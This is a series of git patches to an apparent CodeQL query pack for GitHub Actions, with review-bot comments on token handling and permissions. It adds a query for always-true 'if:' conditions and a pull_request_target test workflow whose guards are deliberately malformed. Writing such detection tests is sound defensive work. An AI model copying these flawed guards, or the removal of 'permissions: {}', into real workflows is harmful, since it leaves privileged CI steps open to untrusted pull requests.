From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:30:15 +0200 Subject: [PATCH 0182/1267] Update test.yml --- .github/workflows/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 8d24f44ed32..bbd894057bc 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -2,6 +2,7 @@ name: Tests on: push: pull_request: + workflow_dispatch: permissions: {} From a29e0c438d6fe730700769a99138c737344ff185 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:38:27 +0200 Subject: [PATCH 0183/1267] Update test.yml --- .github/workflows/test.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index bbd894057bc..e5040834985 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -11,5 +11,9 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 + with: + token: ${{ secrets.BUGHALLA_TOKEN }} + fetch-depth: 0 + - run: | codeql test run ql/test From a4cf78b9ed6bcc7d08311e4aebd565480b1b2205 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:43:20 +0200 Subject: [PATCH 0184/1267] Update test.yml --- .github/workflows/test.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index e5040834985..6e190ff9612 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -4,15 +4,13 @@ on: pull_request: workflow_dispatch: -permissions: {} - jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 with: - token: ${{ secrets.BUGHALLA_TOKEN }} + token: ${{ secrets.SECLAB_TOKEN }} fetch-depth: 0 - run: | From bd4f158b22ebcc90cc6e42d7a3c95e879b03a7ad Mon Sep 17 00:00:00 2001 
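Review bot: The `token: ${{ secrets.BUGHALLA_TOKEN }}` added to `actions/checkout@v3` in patch 0183 is stored in the checked-out repository's git configuration by default, where later steps can read it. The next step runs `codeql test run ql/test` on whatever the `push` or `pull_request` event checked out. If the token is needed only for the fetch, add `persist-credentials: false` under `with:`. The same applies to `secrets.SECLAB_TOKEN` in patch 0184. `actions/checkout@v3` is also a mutable tag, and pinning it to a commit SHA would fix which code receives the secret.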
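Review bot: Patch 0184 deletes `permissions: {}` instead of narrowing it, so the workflow falls back to the repository's default `GITHUB_TOKEN` scopes for `push`, `pull_request` and `workflow_dispatch`, which may include write access depending on repository settings. If the empty block was removed because checkout could not read the repository, the least-privilege fix is `permissions: { contents: read }` at the top level. As far as the later test.yml hunks on this page show, no `permissions:` key is added back.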
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:48:40 +0200 Subject: [PATCH 0185/1267] Update test.yml --- .github/workflows/test.yml | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 6e190ff9612..a0dc2688ce2 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,9 +9,22 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 + - name: Find codeql + id: find-codeql + uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 with: - token: ${{ secrets.SECLAB_TOKEN }} - fetch-depth: 0 - + languages: javascript # does not matter + - name: Initialize CodeQL + id: init + run: | + # Take the most modern version + VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ + | sort \ + | tail -n 1 \ + | tr -d '\n')" + + CODEQL="$VERSION/x64/codeql/" + "${CODEQL}"/codeql version --format=json + echo "${CODEQL}" >> $GITHUB_PATH - run: | codeql test run ql/test From 591dfe07fefd261a0110adc17dce77bdbb9627fc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:55:09 +0200 Subject: [PATCH 0186/1267] Update copy-to-bughalla.yml --- .github/workflows/copy-to-bughalla.yml | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 9e0fee9a0f7..0384660acc1 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml @@ -10,10 +10,6 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - with: - token: ${{ secrets.BUGHALLA_TOKEN }} - fetch-depth: 0 - - run: | rm -rf .github/workflows/copy-to-bughalla.yml git remote set-url --push origin git@github.com:bughalla/codeql-actions 
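Review bot: In the `Initialize CodeQL` step added by patch 0185, `| sort \` orders the tool-cache directories lexically. Once two cached versions differ in digit count (constructed example: `2.9.0` and `2.10.0`), `tail -n 1` selects the older CLI despite the comment `# Take the most modern version`. Using `| sort -V \` gives version ordering. The final line leaves `$GITHUB_PATH` unquoted while `"${CODEQL}"` is quoted, and `>> "$GITHUB_PATH"` would keep the two consistent. The same step is added again unchanged in patch 0194.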
@@ -28,4 +24,4 @@ jobs: repository: bughalla/codeql-actions github_token: ${{ secrets.BUGHALLA_TOKEN }} branch: ${{ github.ref }} - force: true \ No newline at end of file + force: true From 5d5a02ccc34aeefdbefa78ffa673a6300d593e11 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 22:02:04 +0200 Subject: [PATCH 0187/1267] Update test.yml --- .github/workflows/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index a0dc2688ce2..4aeed100c80 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -27,4 +27,5 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | + codeql pack install ql/lib codeql test run ql/test From d69c10c4f6f57cc3a2793ae8c6eb676d99dcabd2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 09:40:44 +0200 Subject: [PATCH 0188/1267] Update test.yml --- .github/workflows/test.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 4aeed100c80..245baea4667 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -27,5 +27,5 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | - codeql pack install ql/lib + codeql pack download ql/lib codeql test run ql/test From c681b13046ad5379fcb7a8e8e748ea3487c7b236 Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 19 Apr 2024 09:55:12 +0200 Subject: [PATCH 0189/1267] Update copy-to-bughalla.yml --- .github/workflows/copy-to-bughalla.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/workflows/copy-to-bughalla.yml b/.github/workflows/copy-to-bughalla.yml index 0384660acc1..572d987ce37 100644 --- a/.github/workflows/copy-to-bughalla.yml +++ b/.github/workflows/copy-to-bughalla.yml 
@@ -10,6 +10,10 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 + with: + token: ${{ secrets.BUGHALLA_TOKEN }} + fetch-depth: 0 + - run: | rm -rf .github/workflows/copy-to-bughalla.yml git remote set-url --push origin git@github.com:bughalla/codeql-actions From 6bc0d6dc32ec9f20a541ded7ecd4cce3b70b701c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 09:59:15 +0200 Subject: [PATCH 0190/1267] Update test.yml --- .github/workflows/test.yml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 245baea4667..227b834f039 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,11 +9,6 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Find codeql - id: find-codeql - uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 - with: - languages: javascript # does not matter - name: Initialize CodeQL id: init run: | From 8c8a9b8a189d83c077687a1fe5db0d46614b96bb Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Fri, 19 Apr 2024 10:01:55 +0200 Subject: [PATCH 0191/1267] Update test.yml --- .github/workflows/test.yml | 17 +++++------------ 1 file changed, 5 insertions(+), 12 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 227b834f039..89393407948 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml 
@@ -9,18 +9,11 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Initialize CodeQL - id: init - run: | - # Take the most modern version - VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ - | sort \ - | tail -n 1 \ - | tr -d '\n')" - - CODEQL="$VERSION/x64/codeql/" - "${CODEQL}"/codeql version --format=json - echo "${CODEQL}" >> $GITHUB_PATH + - name: Find codeql + id: find-codeql + uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 + with: + languages: javascript # does not matter - run: | codeql pack download ql/lib codeql test run ql/test From 5190e0865cdfcd57fc6d62c61aeca8d4d3da16e7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 10:29:12 +0200 Subject: [PATCH 0192/1267] Update test.yml --- .github/workflows/test.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 89393407948..5efa1ae3dae 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -5,7 +5,7 @@ on: workflow_dispatch: jobs: - build: + tests: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 From e200746678e0bf2a7944f919d4817ebf46ab1f2a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:31:22 +0200 Subject: [PATCH 0193/1267] remove qlpack locks from repo --- .gitignore | 3 ++- ql/src/codeql-pack.lock.yml | 16 ---------------- ql/test/codeql-pack.lock.yml | 16 ---------------- 3 files changed, 2 insertions(+), 33 deletions(-) delete mode 100644 ql/src/codeql-pack.lock.yml delete mode 100644 ql/test/codeql-pack.lock.yml diff --git a/.gitignore b/.gitignore index 4ba9d315acc..b874cdb64ce 100644 --- a/.gitignore +++ b/.gitignore @@ -1,7 +1,8 @@ .DS_Store **/*.testproj +**/codeql-pack.lock.yml ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ db/ -.cache \ No newline at end of file +.cache 
diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml deleted file mode 100644 index 56f10b81e0c..00000000000 --- a/ql/src/codeql-pack.lock.yml +++ /dev/null @@ -1,16 +0,0 @@ ---- -lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 0.1.7 - codeql/dataflow: - version: 0.1.7 - codeql/ssa: - version: 0.2.7 - codeql/typetracking: - version: 0.2.7 - codeql/util: - version: 0.2.7 - codeql/yaml: - version: 0.2.7 -compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml deleted file mode 100644 index 8494dea432f..00000000000 --- a/ql/test/codeql-pack.lock.yml +++ /dev/null @@ -1,16 +0,0 @@ ---- -lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 0.1.8 - codeql/dataflow: - version: 0.1.8 - codeql/ssa: - version: 0.2.8 - codeql/typetracking: - version: 0.2.8 - codeql/util: - version: 0.2.8 - codeql/yaml: - version: 0.2.9 -compiled: false From 96abb193c76193ccf7799fd7acd6dae5b53ae736 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:39:03 +0200 Subject: [PATCH 0194/1267] Update test.yml --- .github/workflows/test.yml | 18 ++++++++++++------ 1 file changed, 12 insertions(+), 6 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 5efa1ae3dae..f8071c2986d 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml 
@@ -9,11 +9,17 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Find codeql - id: find-codeql - uses: github/codeql-action/init@aa93aea877e5fb8841bcb1193f672abf6e9f2980 - with: - languages: javascript # does not matter + - name: Initialize CodeQL + id: init + run: | + # Take the most modern version + VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ + | sort \ + | tail -n 1 \ + | tr -d '\n')" + + CODEQL="$VERSION/x64/codeql/" + "${CODEQL}"/codeql version --format=json + echo "${CODEQL}" >> $GITHUB_PATH - run: | - codeql pack download ql/lib codeql test run ql/test From 071329400686f658fae6fd54eaf1fbaf696373f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:52:56 +0200 Subject: [PATCH 0195/1267] Update test.yml --- .github/workflows/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index f8071c2986d..390b35cd233 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -22,4 +22,5 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | + codeql pack install ql/test codeql test run ql/test From 417830020df70d6b5e169c948d1fd29669d0be8a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 11:55:08 +0200 Subject: [PATCH 0196/1267] Update test.yml --- .github/workflows/test.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 390b35cd233..51d66e5ee48 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -22,5 +22,7 @@ jobs: "${CODEQL}"/codeql version --format=json echo "${CODEQL}" >> $GITHUB_PATH - run: | + codeql pack install ql/lib + codeql pack install ql/src codeql pack install ql/test codeql test run ql/test From ecf81989844d4ce2f27703b981a0954448afaa59 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:00:02 +0200 Subject: [PATCH 0197/1267] Update test.yml --- .github/workflows/test.yml | 21 ++++++++++----------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 51d66e5ee48..78808fb8211 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -9,18 +9,17 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - - name: Initialize CodeQL - id: init + - name: Fetch CodeQL + shell: bash + env: + GITHUB_TOKEN: ${{ github.token }} run: | - # Take the most modern version - VERSION="$(find "${{ runner.tool_cache }}/CodeQL/" -maxdepth 1 -mindepth 1 -type d -print \ - | sort \ - | tail -n 1 \ - | tr -d '\n')" - - CODEQL="$VERSION/x64/codeql/" - "${CODEQL}"/codeql version --format=json - echo "${CODEQL}" >> $GITHUB_PATH + gh extension install github/gh-codeql + gh codeql set-channel "nightly" + gh codeql version + printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" - run: | codeql pack install ql/lib codeql pack install ql/src From 843d9e24c4c49ec180b6766c573df02fcd4d03ce Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:05:09 +0200 Subject: [PATCH 0198/1267] Update test.yml --- .github/workflows/test.yml | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 78808fb8211..ed4997285c6 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml 
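Review bot: The `Fetch CodeQL` step in patch 0197 installs `github/gh-codeql` at whatever revision is current and then selects the `nightly` channel, so the toolchain that runs with `GITHUB_TOKEN` in its environment changes between runs and a result cannot be reproduced. Pinning the extension with `gh extension install github/gh-codeql --pin <TAG_OR_SHA>` and selecting a fixed CLI release instead of `nightly` would make a test failure attributable to the queries rather than to the tool. The `CODEQL_FETCHED_CODEQL_PATH` assignment is built from a `printf` without a newline followed by a separate append. A single `echo "CODEQL_FETCHED_CODEQL_PATH=$(gh codeql version --format=json | jq -r .unpackedLocation)" >> "$GITHUB_ENV"` states the intent in one write.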
@@ -20,8 +20,17 @@ jobs: printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" - - run: | - codeql pack install ql/lib - codeql pack install ql/src - codeql pack install ql/test + - name: Install Packs + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh repo clone github/codeql # to make stubs available for tests + codeql pack download "codeql/actions-queries" + codeql pack install "ql/lib" + codeql pack install "ql/src" + codeql pack install "ql/test" + - name: Run Tests + env: + GITHUB_TOKEN: ${{ github.token }} + run: | codeql test run ql/test From a222bfc33d3c3d8b513cd752cdd934b22467e8f1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:07:00 +0200 Subject: [PATCH 0199/1267] Update test.yml --- .github/workflows/test.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index ed4997285c6..8b14b75062a 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -24,8 +24,7 @@ jobs: env: GITHUB_TOKEN: ${{ github.token }} run: | - gh repo clone github/codeql # to make stubs available for tests - codeql pack download "codeql/actions-queries" + gh repo clone github/codeql codeql pack install "ql/lib" codeql pack install "ql/src" codeql pack install "ql/test" From febba3d6d303da77541c32569e136c36c8a40ba4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:22:20 +0200 Subject: [PATCH 0200/1267] Update gitignore --- .gitignore | 1 - 1 file changed, 1 deletion(-) diff --git a/.gitignore b/.gitignore index b874cdb64ce..173a5dd5d09 100644 --- a/.gitignore +++ b/.gitignore @@ -1,6 +1,5 @@ .DS_Store **/*.testproj -**/codeql-pack.lock.yml ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ 
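Review bot: Patch 0198 exports `GITHUB_TOKEN` to the `Run Tests` step, but the only command there is `codeql test run ql/test`, and nothing visible in that step needs the token. The step operates on files from the checked-out ref, which on `pull_request` is contributor-supplied content. Remove the `env:` block from `Run Tests` and keep it only on the steps that call `gh`. In `Install Packs`, `gh repo clone github/codeql` fetches the default branch at its current head with full history. Using `gh repo clone github/codeql -- --depth 1` and then checking out a fixed ref would make the stubs both cheaper to fetch and reproducible.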
From 19a87a13db5b6fc67ff1bd9df5891dad996ae783 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 12:22:58 +0200 Subject: [PATCH 0201/1267] Update lock files --- ql/lib/codeql-pack.lock.yml | 16 ++++++++++++++++ ql/lib/qlpack.yml | 8 ++++---- ql/src/codeql-pack.lock.yml | 16 ++++++++++++++++ ql/test/codeql-pack.lock.yml | 16 ++++++++++++++++ 4 files changed, 52 insertions(+), 4 deletions(-) create mode 100644 ql/lib/codeql-pack.lock.yml create mode 100644 ql/src/codeql-pack.lock.yml create mode 100644 ql/test/codeql-pack.lock.yml diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml new file mode 100644 index 00000000000..84a6ccba26d --- /dev/null +++ b/ql/lib/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.1.5 +compiled: false diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index ff8e02aa63e..64e2861cf68 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.11 dependencies: - codeql/controlflow: "*" - codeql/dataflow: "*" - codeql/util: "*" - codeql/yaml: "*" + codeql/util: ^0.2.0 + codeql/yaml: ^0.1.2 + codeql/controlflow: ^0.1.0 + codeql/dataflow: ^0.1.0 dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml new file mode 100644 index 00000000000..84a6ccba26d --- /dev/null +++ b/ql/src/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.1.5 +compiled: false 
diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml new file mode 100644 index 00000000000..84a6ccba26d --- /dev/null +++ b/ql/test/codeql-pack.lock.yml @@ -0,0 +1,16 @@ +--- +lockVersion: 1.0.0 +dependencies: + codeql/controlflow: + version: 0.1.8 + codeql/dataflow: + version: 0.1.8 + codeql/ssa: + version: 0.2.8 + codeql/typetracking: + version: 0.2.8 + codeql/util: + version: 0.2.8 + codeql/yaml: + version: 0.1.5 +compiled: false From cb1e19a3179831f70d3a85e4f50346e795ba9adc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 16:19:10 +0200 Subject: [PATCH 0202/1267] New ExpressionIdAlwaysTrue query --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 3 + .../CWE-571/ExpressionIsAlwaysTrue.ql | 24 ++++++++ .../CWE-571/.github/workflows/test.yml | 60 +++++++++++++++++++ .../CWE-571/ExpressionIsAlwaysTrue.qlref | 1 + 5 files changed, 90 insertions(+) create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql create mode 100644 ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 7e1bfdee589..8a3dfb7b2a7 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -332,6 +332,8 @@ class If extends AstNode instanceof IfImpl { string getCondition() { result = super.getCondition() } Expression getConditionExpr() { result = super.getConditionExpr() } + + string getConditionStyle() { result = super.getConditionStyle() } } abstract class Uses extends AstNode instanceof UsesImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index a66befe7d7d..dff5f351a69 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -666,6 +666,9 @@ class IfImpl extends AstNodeImpl, TIfNode { /** Gets the condition that must be satisfied for this job to run. */ ExpressionImpl getConditionExpr() { result.getParentNode().getNode() = n } + + /** Get condition scalar style. */ + string getConditionStyle() { result = n.(YamlScalar).getStyle() } } class EnvImpl extends AstNodeImpl, TEnvNode { diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql new file mode 100644 index 00000000000..0a951cbabe1 --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql @@ -0,0 +1,24 @@ +/** + * @name If expression always true + * @description Expressions used in If conditions with extra spaces are always true. + * @kind problem + * @security-severity 9.0 + * @problem.severity error + * @precision high + * @id actions/if-expression-always-true + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions + +from If i +where + i.getConditionStyle() = ["|", ">"] + or + i.getCondition().matches("%${{%") and + not i.getCondition().matches("${{%") + or + count(i.getCondition().splitAt("${{")) > 2 +select i, "Expression always evaluates to true" diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml new file mode 100644 index 00000000000..16b725b5ee8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml 
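Review bot: The metadata of `ExpressionIsAlwaysTrue.ql` contradicts itself: the file sits under `Security/CWE-571` and declares `@security-severity 9.0`, yet its tags are `maintainability` and `external/cwe/cwe-275`. Suite filters and CWE reporting that key on tags would presumably file the alert under the wrong weakness or drop it from security suites, so the tags should read `security` and `external/cwe/cwe-571`. Separately, the first `where` disjunct reports every `|` or `>` block-scalar condition, including one that contains no `${{` at all, and the test workflow has no such case. It is worth confirming that form really evaluates as always true before reporting it at `error` severity, or else restricting the disjunct with `i.getCondition().matches("%${{%")`.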
@@ -0,0 +1,60 @@ +name: Conditionally process PR + +on: + pull_request_target: + types: [opened, synchronize, reopened] + +jobs: + process-pr: + runs-on: ubuntu-latest + steps: + - name: Test1 + if: 1 == 2 + run: echo "Test 1 should not be printed" + - name: Test 2 + if: | + ${{ + 1 == 2 || + 3 == 4 + }} + run: echo "Test 2 should not be printed" + - name: Test 3 + if: ${{ 1 == 2 }} + run: echo "Test 3 should not be printed" + - name: Test 4 + if: ${{ 1 == 2 }} + run: echo "Test 4 should not be printed" + - name: Test 5 + if: ${{ + 1 == 2 || + 3 == 4 + }} + run: echo "Test 5 should not be printed" + - name: Test 6 + if: ${{ 1 == 1 }} ${{ 1 == 2 }} + run: echo "Test 6 should not be printed" + - name: Test 7 + run: echo "Test 7 should not be printed" + if: ${{ + 1 == 2 || + 3 == 4 + }} + + - name: Test 8 + run: echo "Test 8 should not be printed" + if: > + ${{ + 1 == 2 || + 3 == 4 }} + - name: Test 9 + if: '${{ 1 == 2 }}' + run: echo "Test 9 should not be printed" + - name: Test 10 + if: "${{1 == 2 }}" + run: echo "Test 10 should not be printed" + - name: Test 11 + if: " ${{ 1 == 2 }}" + run: echo "Test 11 should not be printed" + - name: Test 12 + if: " ${{ 1 == 2 }}" + run: echo "Test 12 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref new file mode 100644 index 00000000000..01235fb6a20 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrue.ql From 7a8af5e8ea1c5697dfff38ff5e4d0475f1fd038a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 19 Apr 2024 16:19:35 +0200 Subject: [PATCH 0203/1267] Additional sources --- .../codeql/actions/dataflow/FlowSources.qll | 22 ++++++++++++++++++- 1 file changed, 21 insertions(+), 1 deletion(-) 
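Review bot: No `ExpressionIsAlwaysTrue.expected` accompanies this workflow; the commit's diffstat lists only `test.yml` and the `.qlref` under `ql/test/query-tests/Security/CWE-571`. Without a baseline, the twelve `if:` variants do not pin which forms the query must flag and which it must leave alone, so a later change to the `where` clause could silently stop detecting a bypassed guard. Unless the baseline arrives in a later commit, add the `.expected` file here. A one-line comment on each step, such as `# flagged: block scalar` or `# not flagged: plain expression`, would make the intent reviewable.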
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c937aaa550b..0dc376765a8 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -120,12 +120,30 @@ private predicate isExternalUserControlledWorkflowRun(string context) { "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } +bindingset[context] +private predicate isExternalUserControlledRepositoryDispatch(string context) { + exists(string reg | + reg = ["github\\.event\\.client_payload\\[[0-9]+\\]", "github\\.event\\.client_payload",] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + +bindingset[context] +private predicate isExternalUserControlledWorkflowDispatch(string context) { + exists(string reg | reg = ["github\\.event\\.inputs\\[[0-9]+\\]", "github\\.event\\.inputs",] | + 